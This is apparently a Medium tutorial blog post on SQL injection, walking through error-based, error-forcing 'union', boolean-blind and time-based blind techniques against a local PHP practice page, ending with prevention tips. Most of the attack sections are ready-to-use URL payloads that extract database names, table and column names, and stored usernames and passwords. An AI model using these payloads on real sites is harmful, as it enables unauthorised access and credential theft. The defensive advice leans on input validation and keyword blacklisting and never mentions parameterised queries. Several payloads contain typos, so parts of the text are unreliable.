Open in app

Sign in

Write

Sign in

SQL INJECTION — The Coolest Vulnerability

Dheeraj Deshmukh
14 min readDec 29, 2020

--

gif from shahjerry33.medium.com

Hello Everyone, in this blog we are going to learn all about the sql injection, Im very exited to write this blog because this is one of the my favourite vulnerability in injection attacks .In this we will cover the topics like what is sql injection, types of sql injection, techniques to perform sql injection attack, how to prevent your sites from the sql injection and much more with suitable examples and Payloads.Let start…

:::::: ATTACKING ON ANY SITE WITHOUT PERMISSION IS ILLEGAL ::::::

SQL Injection (sqli) :-

As we know that in OWASP(Open Web Application Security Project) top 10 Injection attack holds first position(A1) since 2010 and still remain same . Sql injection is also a type of an injection attack in which attacker inject malicious sql queries via url or by any input box in order to get the private or confidential information from the database of the target. This private and confidential information contains, id- passwords of admin, bank details , identity details , secrets of trade, any government secrets and so on…, if such type of information are leaked then there are lots of threats to the perticular organization like loss of revenue, loss of reputation, loss of privacy etc .It can work on vulnerable webpages and apps that use a backend database like MySQL, Oracle, and MSSQL. By the vulnerability of sql injection attacker are able to perform operations such as , delete, update , modify and insert.

Understand sql injection with example :-

  • let us conside there is a government site in which all the data of property tax and incom tax are saved.
  • Attacker want to delete the recorde of the property tax of someone.
  • Now to do this Attacker start reconnaissance about that site and after that he find vulnerability of sql injection in it.
  • Then attacker run some malicious query and delete the record from the database .
  • Beside of this he get id password of the admin panel of that site in the database through which he can access the admin panel and get full access over the site.
  • In above example attacker give the query to database to work according to attacker . So now replace the give word with the inject which is same as give .
  • So Finally we say that the process of injecting the malicious query to the database which work according to the attacker is known as sql injection .

Sql injection vulnerability is not a vulnerability of any software or server it’s only a vulnerability of code which arisies when unsanitize input are taken.

Types of Sql injection :-

There are mainly three types of sql injection :

  • Error Based sql Injection
  • Union Based sql Injection
  • Blind sql injection

Blind injection are further divided into to type :

  • Boolean-Based Blind sql injection
  • Time-Based Blind sql injection

[1] ERROR BASED SQL INJECTION :-

When attacker give arbitary input via url or input box in order to run malacious query then some kind of errors are generated from the database if query not work properly , then by this error attacker come to know about the structure of the query or database which is define by the developer and then he reconstruct their query according to errors which is in working condition. So in this vulnerability errors are shown that’s why this is known as Error Based Sql Injection.

Perform Attack :-

Attack are performed in following 4 steps —

  1. Break the Query.
  2. Join the Query.
  3. Find Number of Column.
  4. Run second select query and find the place of output from where we get database name , table name , column name and data from the column .

STEP — 1

Break the query :-

The term break the query represent to generate errors by giving arbitary input.In this attacker identify how to write query in order to execute the malicious query.

Following are the ways to break the query :-

  • Single quote :- ’
  • Double quotes :- ”
  • Bracket :- )
  • Single quote with bracket :- ’)
  • Double quotes with bracket :- ”)
  • Backslesh :- \
  • Sometime we dont need to Break the query, we can directly perform it without breaking.

Examples and payload of query break :-

Requirnment :-

  • Mysql
  • Apache2
  • PHP

Firstly you have create a file and database to practise this.

Creating Database :-

I consider that you know about mysql and able to create database . If you Cant then you have to learn mysql first so you are able to understand it properly.

  • Click here to create database for this.
  • Now our database is ready.
  • Make a connection file db_config.php to connect our page to the database.
  • Our connection file is ready.
  • Now make a php file to perform sql injection attack.
  • file name :- error-based-injection-1.php.

content :-

In the above example id parameter is in single quotes so in this example our query is break through single quotes.

  • Open your Browser and Browse your file.

http://localhost/error-based-injection-1.php?id=1

you get username and password of first person.

  • Now Break the Query to perform Sql injection :-
  1. Single Quote:-

Payload :-

http://localhost/error-based-injection-1.php?id=1'

In this way we can break the Query.

2. Single Quote with Bracket :-

$query = “SELECT * from users where id=(‘$id’) LIMIT 0,1”;

Payload:- http://localhost/error-based-injection-1.php?id=1')

3. Brackets :-

$query = “SELECT * from users where id=($id) LIMIT 0,1”;

Payload:- http://localhost/error-based-injection-1.php?id=1)

4. Double Quotes with Bracket :-

$id =’”’ . $id .’”’;
$query = “SELECT * from users where id=($id) LIMIT 0,1”;

Payload:- http://localhost/error-based-injection-1.php?id=1")

5. Nothing to do :-

$query = “SELECT * from users where id=$id LIMIT 0,1”;

Payload:- http://localhost/error-based-injection-1.php?id=1

STEP — 2

Join the query :-

join query is used to join the breaked query in order to run malicious query without any error .

Following are some ways to join the query :-

  • --+
  • --%20
  • %23 value of hash
  • or 1 = ‘1

Payloads :-

Payload:- http://localhost/error-based-injection-1.php?id=1'--+

Payload:- http://localhost/error-based-injection-1.php?id=1'--%20

Payload:- http://localhost/error-based-injection-1.php?id=1' %23

Payload:- http://localhost/error-based-injection-1.php?id=1' or 1 = ‘1

Payload:- http://localhost/error-based-injection-1.php?id=1' or ‘1

In this way we can join the Query.

STEP — 3

Find Number of Column :-

  • Now we have to find out the number of column using order by.
  • To know how many column in the Table we use order by in increasing order and whenever we get error then the privious number is number of column present in the table
  • Payload :-

Payload:- http://localhost/error-based-injection-1.php?id=1' order by 1,2,3 --+

Payload:- http://localhost/error-based-injection-1.php?id=1' order by 1,2,3,4--+

In this we get error.

  • Its confirm that there are 3 columns present in the table.

STEP — 4

Run second select query and find the place of output from where we get data :-

  • To run second select query we use union all select
  • Form step 3 we know that there are 3 column in the table
  • Payload :-

Payload:- http://localhost/error-based-injection-1.php?id=1' union all select 1,2,3--+

  • Now we can get data at any column 1,2 or 3
  1. Find Database Name :-

Function :- database( )

Payload :-

http://localhost/error-based-injection-1.php?id=1' union all select 1,database(),3--+

We get database name at the place of the second column.

2. Find Username :-

Function :- current_user( )

Payload :-

http://localhost/error-based-injection-1.php?id=1' union all select 1,current_user(),3--+

We get username

3. Find Table Name :-

— Now we use information schema to find out all the information

Payload -1 :- Get table name one by one .

http://localhost/error-based-injection-1.php?id=1' union all select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1--+

  • users is your first table name.
  • To get name of another table increase the limit .
  • limit 2,1 get second table name if exist.
  • limit ,1 get thirdtable name if exist. & this process is continue till last table

Payload -2 :- Get all table name at once .

http://localhost/error-based-injection-1.php?id=1' union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

  • We get all the table name from the database at once.
  • In my database 4 tables are present.

4. Find Column Name :-

We find out column name from the user table.

Payload :- 1

http://localhost/error-based-injection-1.php?id=1' union all select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=’users’--+

  • We have 3 column id username and password
  • sometime this payload is not working then use second payload.

Payload :- 2

http://localhost/error-based-injection-1.php?id=1' union all select 1,column_name,3 from information_schema.columns where table_schema=database() and table_name=’users’ limit 1,1--+

  • We get first column name because limit is 1,1
  • Now we have increase limits and extract all the column name from the users table limit 2,1 limit 3,1 and so on …
  • Now we have table name column name no next step is to extract data from the column.

5. Extract Data :-

Payload :- 1

http://localhost/error-based-injection-1.php?id=1' union all select group_concat(id),group_concat(username),group_concat(password) from users where table_schema=database()--+

  • We get all the data from table at once.
  • If you get any error then you should run it one by one

Payload :- 2

http://localhost/error-based-injection-1.php?id=1' union all select id,username,password from users --+

  • Finally We get all the data

[2] UNION BASED INJECTION :-

image by :- security Idiots !!

In this injection we get data on screen but that data is constant not from the database it always looks same and can’t give any errors,if we break the query then it give us blank page and then we join the query then again the same data shown on the screen .Now in this case we have to generate error and in that error we get our all the data.

Code of thi file :-

file name :- union-based-injection.php

Payloads :-

  • To find database name :-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a , floor(rand()*2))a from information_schema.tables group by a)b)--+

You will get database name between ::: ::: and if you cant get then refresh it again and again.

  • To Find Username :-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select current_user()),0x3a,0x3a , floor(rand()*2))a from information_schema.tables group by a)b)--+

You will get user name between ::: ::: and if you cant get then refresh it again and again.

  • To find table name :-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

— You will get first table name from this now we have to increase limit and find out all the table name.

— We will get table name between the ::: ::: and if you cant get then refresh it again and again.

  • Find Column name from the table :-

Let suppose we get table name users from the above step

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name=’user’ and table_schema = database() limit 0,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

— You will get first column name from this now we have to increase limit and find out all the column name from the table user.

— We will get column name between the ::: ::: and if you cant get then refresh it again and again.

  • Find the data from the column :-

let we have column name — id,name,username,password

payload for Id :-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select id from user where table_schema = database() limit 0,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

payload for name:-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select name from user where table_schema = database() limit 0,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

payload for username:-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select username from user where table_schema = database() limit 0,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

payload for password:-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select passwordfrom user where table_schema = database() limit 0,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

— In this way we can get the whole data from the firt row.

— For the data of second row inrease the limit to 1,0 and start same as above again.

  • And Finally we get all the data from the table .

[3] Blind Injection :-

image by :- digitalmunition

It’s name say all the things about this injection, here blind represents to no errors we are unable to see any errors and we also not able to generate error like union based injection in this case we use blind sql injection. This injection give us answer in yes and no , we ask from the site that the databse name is less then 5 charecter if yes then it show content of the page normally and if no then there is something missing in the content of the page. It seems that database is talking with us and this is wonderfull vulnerability .

Blind Sql injection is further divided into the Two types :-

  1. Boolean Based Sql injection
  2. Time Based Sql injection

BOOLEAN BASED SQL INJECTION :-

In this sql injection we ask yes or no from the database and databse also give answer in yes and no this is the functionality of the database. Such type of conditions occur whenever Error Handeling of the data base is not working properly , in every site there is a lots of vunerability present no matter how much it is secure but there is always a threat of hacking is over the head of every site and server its all depend upon the skills and echiniques of the hacker. And Most of the sites are affected by the Blind sql injection and the xss injection attack.

In Boolean Based we talk with the database in numbers, characters and also from the assci value of the sign,symbol and characters.

Following are some example of payload of boolean based blind sql injection :-

Payload :- 1

  • To find the length of the database name :-

http://localhost/boolean-based-injection.php?id=1' AND (select length(database()) > 5)--+

http://localhost/boolean-based-injection.php?id=1' AND (select length(database()) < 6)--+

http://localhost/boolean-based-injection.php?id=1' AND (select length(database()) = 5)--+

  • Find out the database name :-

http://localhost/boolean-based-injection.php?id=1' AND (select ascii(substr(database(),1,1)) < 110 )--+

http://localhost/boolean-based-injection.php?id=1' AND (select ascii(substr(database(),1,1)) = 108 )--+

http://localhost/boolean-based-injection.php?id=1' AND (select ascii(substr(database(),2,1)) >108 )--+

— Increase the limit from 1,1 to 2,1 3,1…….

— Here characters are check by their ascii value

  • Find out the table name number And table length :-

http://localhost/boolean-based-injection.php?id=1' AND ( select length(table_name) from information_schema.tables where table_schema=database() limit 0,1) = 3--+

http://localhost/boolean-based-injection.php?id=1' AND ( select length(table_name) from information_schema.tables where table_schema=database() limit 1,1) < 5--+

http://localhost/boolean-based-injection.php?id=1' AND ( select length(table_name) from information_schema.tables where table_schema=database() limit 0,1) > 10--+

— Increase the limit from 1,1 to 2,1 3,1…….

— We can find both number of table present into the database and also the length of that table.

  • Find out the table name :-

http://localhost/boolean-based-injection.php?id=1' AND ( select ascii(substr(table_name,{0,1)) from information_schema.tables where table_schema=database() limit {0,1) > 105--+

http://localhost/boolean-based-injection.php?id=1' AND ( select ascii(substr(table_name,{0,1)) from information_schema.tables where table_schema=database() limit {1,1) = 103--+

— Increase both the limit from 1,1 to 2,1 3,1…….

— In this way we can extract all the data

— Disadvantage of this is it take lots of time to perform this injection manully thats why we use automated tools like sql map or scripts of python.

TIME BASED SQL INJECTION :-

In this injection we can identify the answers from the site by make them sleep for som specific time like 10 sec, 5 sec to identify that our answers is correct or not . If our answer is correct then it sleep for the defined time and if answer is wrong site is unable to sleep.In this way this injection also make database talkitive .

Following are some example of payload of Time based blind sql injection :-

  • Find database :-

select if((select datbase())=’sqli’ ,sleep(10),null)

  • Find Length of table :-

select if((select length(table_name) from information_schema.tables where table_schema = database() limit 0,1)=6,sleep(10),null);

  • Find Name of the table :-

select if((select ascii(substr(table_name)) from information_schema.tables where table_schema = database() limit 0,1)=’115',sleep(10),null);

— In this way we can find all the data from the database.

[*] PREVENTION FROM THE SQL INJECTION

  • First and most important thing to prevent from the sql injection to take the sanatize and proper validate input from the users by which attacker are unable to inject malicious queries.
  • Set the limit to take input, like if we want to take username from the user then validate it by the 30 character no any username contains more than 30 character
  • Whitelist the character and numbers.
  • Blacklist the words which are used in malicious queries like union,sleep,if etc. By which if attacker want to do attack using this queries then site denies the permissions and block the attackers like Cloudflare. Cloudflare instant give the block message to the attacker.
  • Dont trust on firewall to protect against the sql injection its only a myth that firewall protect the site from sql injection attack.
  • Use different server for database rather than the web server if attacker attacked on the web server then they are unable to reach to the database server .
  • Dont trust on ssl certificate by using ssl your site is not safe the work of ssl is to only transmit the data safely from the web server to the user browser.
  • Do not connect your application to the database using an account with root access. Using a limited access account is safe.
  • The safest way is to write the secure code with proper validation and provide only necessary functionality to the users and check your code again and again to make sure that there is no loop hole for the attackers.

Thank You for reading this blog.

If you have any Doubt regarding this then feel free to contact with me

You can follow me on linkedin and twitter

Linkedin :- https://www.linkedin.com/in/dheeraj-deshmukh-65b7901a4/

Twitter :- https://twitter.com/dheeraj_deshmuk

Sqli
Sql Injection
Vulnerability
Ethical Hacking
Cybersecurity

--

--

Dheeraj Deshmukh

Written by Dheeraj Deshmukh

92 Followers

OSCP | Penetration Tester

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams